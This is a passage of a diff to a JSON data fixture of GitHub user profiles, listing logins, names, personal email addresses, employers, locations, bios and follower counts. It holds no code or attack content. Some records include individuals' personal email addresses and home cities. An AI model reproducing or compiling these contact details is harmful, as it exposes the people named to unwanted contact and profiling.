"https://avatars.githubusercontent.com/u/3264937?v=4", + "company": "@urbanclap-engg", + "location": "India", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 28, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2013-01-14T12:39:41Z", + "updated_at": "2024-09-07T04:28:18Z", + "node_id": "MDQ6VXNlcjMyNjQ5Mzc=", + "bio": "Engineering Manager, Security & Platforms", + "is_hireable": true, + "twitter_username": "karanb192" + } +}, +{ + "model": "github.user", + "pk": 8555, + "fields": { + "nest_created_at": "2024-09-22T10:44:35.552Z", + "nest_updated_at": "2024-09-22T20:29:44.871Z", + "name": "Juan Martín Sotuyo Dodero", + "login": "jsotuyod", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/802626?v=4", "company": "", - "location": "", + "location": "Buenos Aires, Argentina", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 10, + "followers_count": 120, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2018-03-05T14:22:18Z", - "updated_at": "2024-06-01T13:31:55Z", - "node_id": "MDQ6VXNlcjM3MDc1OTk3", + "public_repositories_count": 5, + "created_at": "2011-05-21T20:49:48Z", + "updated_at": "2024-09-19T12:54:10Z", + "node_id": "MDQ6VXNlcjgwMjYyNg==", "bio": "", "is_hireable": false, + "twitter_username": "jsotuyod" + } +}, +{ + "model": "github.user", + "pk": 8556, + "fields": { + "nest_created_at": "2024-09-22T10:44:36.180Z", + "nest_updated_at": "2024-09-22T20:29:45.495Z", + "name": "Hansol Choe", + "login": "HansolChoe", + "email": "hansol614@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2330143?v=4", + "company": "Suresoft Technologies Inc.", + "location": "Teheran-ro, Gangnam-gu, Seoul", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 7, + "public_gists_count": 3, + "public_repositories_count": 39, + "created_at": "2012-09-12T08:02:47Z", + "updated_at": "2024-08-27T01:41:07Z", + "node_id": "MDQ6VXNlcjIzMzAxNDM=", + "bio": "Senior Research Engineer at Code Analysis Technology Team", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3153, + "pk": 8557, "fields": { - "nest_created_at": "2024-09-12T03:15:00.022Z", - "nest_updated_at": "2024-09-12T03:15:00.022Z", - "name": "", - "login": "Captain-Archibald-Haddock", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/152749730?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:44:36.830Z", + "nest_updated_at": "2024-09-22T20:29:46.122Z", + "name": "Karol Dowbecki", + "login": "kdowbecki", + "email": "karol@dowbecki.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1257044?v=4", + "company": "JPMorgan Chase", + "location": "London, United Kingdom", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 2, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-12-02T23:53:42Z", - "updated_at": "2023-12-02T23:57:00Z", - "node_id": "U_kgDOCRrGog", - "bio": "Cybersecurity Researcher! Offensive Security!", + "public_repositories_count": 14, + "created_at": "2011-12-12T09:56:13Z", + "updated_at": "2024-02-22T18:39:26Z", + "node_id": "MDQ6VXNlcjEyNTcwNDQ=", + "bio": "Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3154, + "pk": 8558, "fields": { - "nest_created_at": "2024-09-12T03:15:02.614Z", - "nest_updated_at": "2024-09-12T03:15:02.614Z", + "nest_created_at": "2024-09-22T10:44:37.141Z", + "nest_updated_at": "2024-09-22T20:29:46.436Z", "name": "", - "login": "paillp", + "login": "Kidlike", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68086605?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5050182?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-07-09T22:45:36Z", - "updated_at": "2024-01-31T09:32:57Z", - "node_id": "MDQ6VXNlcjY4MDg2NjA1", + "following_count": 1, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 43, + "created_at": "2013-07-19T21:17:37Z", + "updated_at": "2024-07-07T16:32:08Z", + "node_id": "MDQ6VXNlcjUwNTAxODI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439103,124 +699877,149 @@ }, { "model": "github.user", - "pk": 3155, + "pk": 8559, "fields": { - "nest_created_at": "2024-09-12T03:15:03.464Z", - "nest_updated_at": "2024-09-12T03:15:03.464Z", - "name": "Douglas S. Santos", - "login": "dogasantos", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4156021?v=4", + "nest_created_at": "2024-09-22T10:44:37.450Z", + "nest_updated_at": "2024-09-22T20:29:46.762Z", + "name": "Kwangyong Kim", + "login": "bananayong", + "email": "banana.yong@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/963247?v=4", "company": "", - "location": "Brazil, São Paulo", + "location": "Seoul", "collaborators_count": 0, - "following_count": 19, - "followers_count": 20, - "public_gists_count": 3, - "public_repositories_count": 140, - "created_at": "2013-04-15T01:51:51Z", - "updated_at": "2024-05-24T03:29:00Z", - "node_id": "MDQ6VXNlcjQxNTYwMjE=", - "bio": "IM NOT A DEVELOPER. STOP INVITING ME FOR POSITIONS IN THIS FIELD.\r\nhttps://www.linkedin.com/in/dsecco/", + "following_count": 106, + "followers_count": 34, + "public_gists_count": 18, + "public_repositories_count": 15, + "created_at": "2011-08-06T16:08:13Z", + "updated_at": "2024-09-16T14:21:05Z", + "node_id": "MDQ6VXNlcjk2MzI0Nw==", + "bio": "🇰🇷😎🐄☀️🍌 Software Engineer", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3156, + "pk": 8560, "fields": { - "nest_created_at": "2024-09-12T03:15:04.303Z", - "nest_updated_at": "2024-09-12T03:15:04.303Z", - "name": "Halim Jabbes", - "login": "hxlxmjxbbxs", + "nest_created_at": "2024-09-22T10:44:37.762Z", + "nest_updated_at": "2024-09-22T20:29:47.071Z", + "name": "Nick", + "login": "kulinacs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/96540322?v=4", - "company": "Wezoom", - "location": "Montreal, CA", + "avatar_url": "https://avatars.githubusercontent.com/u/9296478?v=4", + "company": "", + "location": "Dallas, Texas", "collaborators_count": 0, - "following_count": 157, - "followers_count": 32, - "public_gists_count": 33, - "public_repositories_count": 1697, - "created_at": "2021-12-22T16:20:46Z", - "updated_at": "2024-09-04T05:30:23Z", - "node_id": "U_kgDOBcEWog", - "bio": "My passion and profession lie in cybersecurity, with a focus on its offensive aspects. I'm dedicated to exploring the latest trends and techniques.", + "following_count": 26, + "followers_count": 44, + "public_gists_count": 6, + "public_repositories_count": 113, + "created_at": "2014-10-18T15:42:57Z", + "updated_at": "2024-09-05T06:08:46Z", + "node_id": "MDQ6VXNlcjkyOTY0Nzg=", + "bio": "Security Enthusiast\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3157, + "pk": 8561, "fields": { - "nest_created_at": "2024-09-12T03:15:05.135Z", - "nest_updated_at": "2024-09-12T03:15:05.135Z", - "name": "", - "login": "Nzoth9", + "nest_created_at": "2024-09-22T10:44:38.087Z", + "nest_updated_at": "2024-09-22T20:29:47.395Z", + "name": "Sergei Tikhomirov", + "login": "s-tikhomirov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/67303734?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7126627?v=4", + "company": "@waku-org ", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 10, + "followers_count": 91, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-06-23T03:39:31Z", - "updated_at": "2024-08-26T22:06:05Z", - "node_id": "MDQ6VXNlcjY3MzAzNzM0", + "public_repositories_count": 37, + "created_at": "2014-04-01T12:10:47Z", + "updated_at": "2024-09-10T14:26:20Z", + "node_id": "MDQ6VXNlcjcxMjY2Mjc=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "serg_tikhomirov" } }, { "model": "github.user", - "pk": 3158, + "pk": 8562, "fields": { - "nest_created_at": "2024-09-12T03:15:05.967Z", - "nest_updated_at": "2024-09-12T03:15:05.967Z", - "name": "Muxue", - "login": "secxue", + "nest_created_at": "2024-09-22T10:44:38.404Z", + "nest_updated_at": "2024-09-22T20:29:47.717Z", + "name": "Taher Ghaleb", + "login": "Taher-Ghaleb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89639483?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25190974?v=4", + "company": "University of Ottawa", + "location": "Ottawa, Canada", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 109, + "created_at": "2017-01-18T03:04:41Z", + "updated_at": "2024-09-06T17:25:44Z", + "node_id": "MDQ6VXNlcjI1MTkwOTc0", + "bio": "Postdoctoral Research Fellow", + "is_hireable": false, + "twitter_username": "TaherGhaleb" + } +}, +{ + "model": "github.user", + "pk": 8563, + "fields": { + "nest_created_at": "2024-09-22T10:44:38.725Z", + "nest_updated_at": "2024-09-22T20:29:48.032Z", + "name": "Thiyagarajan", + "login": "thiyagu-7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38608518?v=4", "company": "", - "location": "", + "location": "Chennai", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 6, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-08-27T10:45:30Z", - "updated_at": "2024-08-15T13:22:11Z", - "node_id": "MDQ6VXNlcjg5NjM5NDgz", - "bio": "", + "public_repositories_count": 27, + "created_at": "2018-04-22T09:19:16Z", + "updated_at": "2024-06-13T15:05:24Z", + "node_id": "MDQ6VXNlcjM4NjA4NTE4", + "bio": "Software developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3159, + "pk": 8564, "fields": { - "nest_created_at": "2024-09-12T03:15:06.810Z", - "nest_updated_at": "2024-09-12T03:15:06.810Z", + "nest_created_at": "2024-09-22T10:44:39.363Z", + "nest_updated_at": "2024-09-22T20:29:48.673Z", "name": "", - "login": "igaralf", + "login": "deepsan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25309860?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/159417?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-01-23T22:06:23Z", - "updated_at": "2024-05-10T20:27:40Z", - "node_id": "MDQ6VXNlcjI1MzA5ODYw", + "public_repositories_count": 4, + "created_at": "2009-11-29T10:09:51Z", + "updated_at": "2023-01-21T01:22:11Z", + "node_id": "MDQ6VXNlcjE1OTQxNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439228,24 +700027,24 @@ }, { "model": "github.user", - "pk": 3160, + "pk": 8565, "fields": { - "nest_created_at": "2024-09-12T03:15:08.500Z", - "nest_updated_at": "2024-09-12T03:15:08.500Z", - "name": "", - "login": "Suryanshuraghav007", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109915850?v=4", + "nest_created_at": "2024-09-22T10:44:39.678Z", + "nest_updated_at": "2024-09-22T20:29:48.993Z", + "name": "Marcel Lekston", + "login": "marcelel", + "email": "marcel.lekston@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18199608?v=4", "company": "", - "location": "", + "location": "Kraków", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 5, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2022-07-24T16:39:32Z", - "updated_at": "2023-12-04T18:55:46Z", - "node_id": "U_kgDOBo0uyg", + "public_repositories_count": 49, + "created_at": "2016-03-31T22:30:38Z", + "updated_at": "2023-08-07T16:39:21Z", + "node_id": "MDQ6VXNlcjE4MTk5NjA4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439253,24 +700052,24 @@ }, { "model": "github.user", - "pk": 3161, + "pk": 8566, "fields": { - "nest_created_at": "2024-09-12T03:15:09.324Z", - "nest_updated_at": "2024-09-12T03:15:09.324Z", - "name": "Rami", - "login": "Raammi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/155196952?v=4", + "nest_created_at": "2024-09-22T10:44:39.992Z", + "nest_updated_at": "2024-09-22T20:29:49.397Z", + "name": "Patrice CAVEZZAN", + "login": "pcavezzan", + "email": "pcavezzan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3405916?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2023-12-29T21:21:44Z", - "updated_at": "2024-08-20T23:32:10Z", - "node_id": "U_kgDOCUAeGA", + "following_count": 6, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 60, + "created_at": "2013-01-28T12:58:55Z", + "updated_at": "2024-09-18T09:25:28Z", + "node_id": "MDQ6VXNlcjM0MDU5MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439278,24 +700077,24 @@ }, { "model": "github.user", - "pk": 3162, + "pk": 8567, "fields": { - "nest_created_at": "2024-09-12T03:15:10.168Z", - "nest_updated_at": "2024-09-12T03:15:10.168Z", - "name": "Ramin", - "login": "Turboramin", + "nest_created_at": "2024-09-22T10:44:40.315Z", + "nest_updated_at": "2024-09-22T20:29:49.707Z", + "name": "", + "login": "woung717", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43754521?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9071179?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-10-01T15:03:09Z", - "updated_at": "2024-08-18T11:43:39Z", - "node_id": "MDQ6VXNlcjQzNzU0NTIx", + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2014-10-08T07:12:25Z", + "updated_at": "2024-08-29T12:15:03Z", + "node_id": "MDQ6VXNlcjkwNzExNzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439303,74 +700102,99 @@ }, { "model": "github.user", - "pk": 3163, + "pk": 8568, "fields": { - "nest_created_at": "2024-09-12T03:15:11.034Z", - "nest_updated_at": "2024-09-12T03:15:11.034Z", - "name": "Prince William", - "login": "iprincs", + "nest_created_at": "2024-09-22T10:44:40.956Z", + "nest_updated_at": "2024-09-22T20:29:50.381Z", + "name": "Jeanne", + "login": "boyarsky", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/99089001?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/416926?v=4", "company": "", - "location": "", + "location": "New York", "collaborators_count": 0, - "following_count": 5, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-02-05T16:33:59Z", - "updated_at": "2024-03-08T09:12:41Z", - "node_id": "U_kgDOBef6aQ", - "bio": "HACKER", + "following_count": 2, + "followers_count": 221, + "public_gists_count": 1, + "public_repositories_count": 52, + "created_at": "2010-09-27T00:33:22Z", + "updated_at": "2024-07-13T12:55:07Z", + "node_id": "MDQ6VXNlcjQxNjkyNg==", + "bio": "", "is_hireable": false, + "twitter_username": "jeanneboyarsky" + } +}, +{ + "model": "github.user", + "pk": 8569, + "fields": { + "nest_created_at": "2024-09-22T10:44:41.267Z", + "nest_updated_at": "2024-09-22T20:29:50.705Z", + "name": "Jean-Baptiste Le Duigou", + "login": "jbleduigou", + "email": "jb.leduigou@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1489214?v=4", + "company": "Aircall", + "location": "Brest, France", + "collaborators_count": 0, + "following_count": 43, + "followers_count": 26, + "public_gists_count": 30, + "public_repositories_count": 69, + "created_at": "2012-03-01T16:27:39Z", + "updated_at": "2024-09-19T18:19:07Z", + "node_id": "MDQ6VXNlcjE0ODkyMTQ=", + "bio": "Senior Software Engineer ☁️ AWS Certified", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3164, + "pk": 8570, "fields": { - "nest_created_at": "2024-09-12T03:15:11.870Z", - "nest_updated_at": "2024-09-12T03:15:13.614Z", - "name": "Dzenan Palavra", - "login": "dpalavra", + "nest_created_at": "2024-09-22T10:44:41.894Z", + "nest_updated_at": "2024-09-22T20:29:51.374Z", + "name": "", + "login": "HairyFotr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82952643?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/566245?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-04-21T13:21:51Z", - "updated_at": "2024-07-15T14:54:29Z", - "node_id": "MDQ6VXNlcjgyOTUyNjQz", + "following_count": 329, + "followers_count": 113, + "public_gists_count": 6, + "public_repositories_count": 96, + "created_at": "2011-01-15T14:00:21Z", + "updated_at": "2024-05-13T21:56:18Z", + "node_id": "MDQ6VXNlcjU2NjI0NQ==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3165, + "pk": 8571, "fields": { - "nest_created_at": "2024-09-12T03:15:12.748Z", - "nest_updated_at": "2024-09-12T03:15:12.748Z", + "nest_created_at": "2024-09-22T10:44:42.210Z", + "nest_updated_at": "2024-09-22T20:29:51.705Z", "name": "", - "login": "stephen-devops", + "login": "winfriedgerlach", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/136968848?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/158032591?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-06-18T10:48:01Z", - "updated_at": "2024-09-10T11:38:50Z", - "node_id": "U_kgDOCCn6kA", + "public_repositories_count": 1, + "created_at": "2024-01-29T08:44:10Z", + "updated_at": "2024-03-21T13:22:46Z", + "node_id": "U_kgDOCWtizw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439378,49 +700202,49 @@ }, { "model": "github.user", - "pk": 3166, + "pk": 8572, "fields": { - "nest_created_at": "2024-09-12T03:15:14.468Z", - "nest_updated_at": "2024-09-12T03:15:14.468Z", - "name": "Syed Ahmad Mujtaba", - "login": "mujtabasec", + "nest_created_at": "2024-09-22T10:44:42.838Z", + "nest_updated_at": "2024-09-22T20:29:52.334Z", + "name": "Christoph Dreis", + "login": "dreis2211", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72700323?v=4", - "company": "", - "location": "Pakistan", + "avatar_url": "https://avatars.githubusercontent.com/u/6304496?v=4", + "company": "InnoGames GmbH", + "location": "", "collaborators_count": 0, - "following_count": 16, - "followers_count": 1, + "following_count": 0, + "followers_count": 90, "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2020-10-11T15:11:49Z", - "updated_at": "2024-08-12T11:54:22Z", - "node_id": "MDQ6VXNlcjcyNzAwMzIz", - "bio": "Security Researcher | Pentester | Bug Bounty Hunter | Hack3r\r\n", - "is_hireable": true, - "twitter_username": "mujtabasec" + "public_repositories_count": 80, + "created_at": "2014-01-02T15:55:54Z", + "updated_at": "2024-07-01T13:40:57Z", + "node_id": "MDQ6VXNlcjYzMDQ0OTY=", + "bio": "\r\n Software-Developer @innogames.\r\n", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3167, + "pk": 8573, "fields": { - "nest_created_at": "2024-09-12T03:15:15.303Z", - "nest_updated_at": "2024-09-12T03:15:15.303Z", - "name": "", - "login": "677230756E64", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/130088857?v=4", - "company": "", + "nest_created_at": "2024-09-22T10:44:43.506Z", + "nest_updated_at": "2024-09-22T20:29:52.949Z", + "name": "Andrew Paseltiner", + "login": "apasel422", + "email": "apaseltiner@google.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8644784?v=4", + "company": "Google Chrome", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2023-04-06T17:39:42Z", - "updated_at": "2024-04-29T16:44:52Z", - "node_id": "U_kgDOB8D_mQ", + "following_count": 1, + "followers_count": 72, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2014-09-03T16:55:43Z", + "updated_at": "2024-07-01T12:41:49Z", + "node_id": "MDQ6VXNlcjg2NDQ3ODQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439428,39 +700252,39 @@ }, { "model": "github.user", - "pk": 3168, + "pk": 8574, "fields": { - "nest_created_at": "2024-09-12T03:15:16.150Z", - "nest_updated_at": "2024-09-12T03:15:16.150Z", - "name": "", - "login": "hudsonrock-partnerships", + "nest_created_at": "2024-09-22T10:44:43.835Z", + "nest_updated_at": "2024-09-22T20:29:53.263Z", + "name": "Andrea", + "login": "thypon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/163282900?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/581115?v=4", + "company": "@brave", + "location": "Isengard, Middle-earth", "collaborators_count": 0, - "following_count": 0, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 37, - "created_at": "2024-03-13T08:53:11Z", - "updated_at": "2024-08-18T18:03:38Z", - "node_id": "U_kgDOCbt_1A", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 19, + "followers_count": 140, + "public_gists_count": 28, + "public_repositories_count": 104, + "created_at": "2011-01-24T16:49:42Z", + "updated_at": "2024-09-20T07:38:48Z", + "node_id": "MDQ6VXNlcjU4MTExNQ==", + "bio": "Code is code, and code breaks", + "is_hireable": true, + "twitter_username": "nJoyneer" } }, { "model": "github.user", - "pk": 3169, + "pk": 8575, "fields": { - "nest_created_at": "2024-09-12T03:15:17.030Z", - "nest_updated_at": "2024-09-12T03:15:17.030Z", + "nest_created_at": "2024-09-22T10:44:44.145Z", + "nest_updated_at": "2024-09-22T20:29:53.577Z", "name": "", - "login": "manguy0", + "login": "minozhenko", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/173408683?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/23302542?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -439468,9 +700292,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2024-06-20T20:52:15Z", - "updated_at": "2024-06-20T21:29:16Z", - "node_id": "U_kgDOClYBqw", + "created_at": "2016-11-07T01:56:30Z", + "updated_at": "2020-06-29T01:23:40Z", + "node_id": "MDQ6VXNlcjIzMzAyNTQy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439478,24 +700302,49 @@ }, { "model": "github.user", - "pk": 3170, + "pk": 8576, "fields": { - "nest_created_at": "2024-09-12T03:15:17.843Z", - "nest_updated_at": "2024-09-12T03:15:17.844Z", - "name": "VER007", - "login": "ver007", + "nest_created_at": "2024-09-22T10:45:22.928Z", + "nest_updated_at": "2024-09-22T20:30:32.619Z", + "name": "Jan Waś", + "login": "nineinchnick", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4726296?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/795177?v=4", + "company": "@starburstdata", + "location": "Białystok, Poland", "collaborators_count": 0, - "following_count": 152, - "followers_count": 125, + "following_count": 272, + "followers_count": 168, + "public_gists_count": 10, + "public_repositories_count": 110, + "created_at": "2011-05-18T06:55:58Z", + "updated_at": "2024-08-01T17:57:12Z", + "node_id": "MDQ6VXNlcjc5NTE3Nw==", + "bio": "Cyber Cowboy", + "is_hireable": true, + "twitter_username": "n1neinchnick" + } +}, +{ + "model": "github.user", + "pk": 8577, + "fields": { + "nest_created_at": "2024-09-22T10:45:23.899Z", + "nest_updated_at": "2024-09-22T20:30:33.588Z", + "name": "Daniel Ostertag", + "login": "Dakes", + "email": "dakes@vivaldi.net", + "avatar_url": "https://avatars.githubusercontent.com/u/20887264?v=4", + "company": "@meteocontrol", + "location": "Germany, Augsburg", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 5, "public_gists_count": 1, - "public_repositories_count": 801, - "created_at": "2013-06-18T07:58:13Z", - "updated_at": "2024-08-10T12:14:15Z", - "node_id": "MDQ6VXNlcjQ3MjYyOTY=", + "public_repositories_count": 21, + "created_at": "2016-08-07T12:48:32Z", + "updated_at": "2024-09-13T13:12:47Z", + "node_id": "MDQ6VXNlcjIwODg3MjY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439503,24 +700352,24 @@ }, { "model": "github.user", - "pk": 3171, + "pk": 8578, "fields": { - "nest_created_at": "2024-09-12T03:15:18.643Z", - "nest_updated_at": "2024-09-12T03:15:18.643Z", - "name": "", - "login": "tlimlam", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121858741?v=4", + "nest_created_at": "2024-09-22T10:45:24.213Z", + "nest_updated_at": "2024-09-22T20:30:33.905Z", + "name": "Rohit Shambhuni", + "login": "shambho", + "email": "shambhuni.rohit@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8888779?v=4", "company": "", - "location": "", + "location": "San Francisco, CA", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-03T09:16:19Z", - "updated_at": "2024-06-28T17:26:05Z", - "node_id": "U_kgDOB0NqtQ", + "public_repositories_count": 2, + "created_at": "2014-09-23T22:27:27Z", + "updated_at": "2024-08-01T09:49:42Z", + "node_id": "MDQ6VXNlcjg4ODg3Nzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439528,49 +700377,74 @@ }, { "model": "github.user", - "pk": 3172, + "pk": 8579, "fields": { - "nest_created_at": "2024-09-12T03:15:19.479Z", - "nest_updated_at": "2024-09-12T03:15:20.297Z", - "name": "小健健", - "login": "m4ra7h0n", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71647398?v=4", - "company": "Xiaomi Inc.", - "location": "nanjing", + "nest_created_at": "2024-09-22T10:45:25.557Z", + "nest_updated_at": "2024-09-22T20:30:35.182Z", + "name": "Jannik Schäfer", + "login": "jnk22", + "email": "jannik-schaefer@inbox-online.de", + "avatar_url": "https://avatars.githubusercontent.com/u/24391401?v=4", + "company": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 74, - "followers_count": 14, + "following_count": 10, + "followers_count": 46, "public_gists_count": 1, - "public_repositories_count": 36, - "created_at": "2020-09-21T12:55:34Z", - "updated_at": "2024-09-05T12:23:21Z", - "node_id": "MDQ6VXNlcjcxNjQ3Mzk4", - "bio": "a easy man\r\n\r\n", + "public_repositories_count": 17, + "created_at": "2016-12-05T15:08:17Z", + "updated_at": "2024-09-06T12:31:14Z", + "node_id": "MDQ6VXNlcjI0MzkxNDAx", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3173, + "pk": 8580, "fields": { - "nest_created_at": "2024-09-12T03:15:21.120Z", - "nest_updated_at": "2024-09-12T03:15:21.120Z", - "name": "", - "login": "marcelo321", + "nest_created_at": "2024-09-22T10:45:25.866Z", + "nest_updated_at": "2024-09-22T20:30:35.499Z", + "name": "redshiftzero", + "login": "redshiftzero", + "email": "jen@penumbralabs.xyz", + "avatar_url": "https://avatars.githubusercontent.com/u/7832803?v=4", + "company": "@penumbra-zone ", + "location": "remote", + "collaborators_count": 0, + "following_count": 59, + "followers_count": 228, + "public_gists_count": 25, + "public_repositories_count": 141, + "created_at": "2014-06-08T21:37:15Z", + "updated_at": "2024-01-02T16:54:18Z", + "node_id": "MDQ6VXNlcjc4MzI4MDM=", + "bio": "⛰️🌲🐍🧙😇🧙🐍🌲⛰️\r\nhow do u do fellow humans🛹", + "is_hireable": false, + "twitter_username": "redshiftzero" + } +}, +{ + "model": "github.user", + "pk": 8581, + "fields": { + "nest_created_at": "2024-09-22T10:45:26.188Z", + "nest_updated_at": "2024-09-22T20:30:35.809Z", + "name": "Pooja Avhad", + "login": "avhadpooja", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29487296?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/36248454?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2017-06-16T15:53:59Z", - "updated_at": "2024-07-01T04:51:52Z", - "node_id": "MDQ6VXNlcjI5NDg3Mjk2", + "public_repositories_count": 13, + "created_at": "2018-02-07T23:45:42Z", + "updated_at": "2022-11-28T20:06:26Z", + "node_id": "MDQ6VXNlcjM2MjQ4NDU0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439578,24 +700452,24 @@ }, { "model": "github.user", - "pk": 3174, + "pk": 8582, "fields": { - "nest_created_at": "2024-09-12T03:15:21.953Z", - "nest_updated_at": "2024-09-12T03:15:21.953Z", - "name": "", - "login": "anaroth-pt", + "nest_created_at": "2024-09-22T10:45:26.504Z", + "nest_updated_at": "2024-09-22T20:30:36.180Z", + "name": "Chad Eckles", + "login": "chadeckles", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/179763080?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26659016?v=4", + "company": "GitHub", + "location": "Colorado", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-08-28T21:22:15Z", - "updated_at": 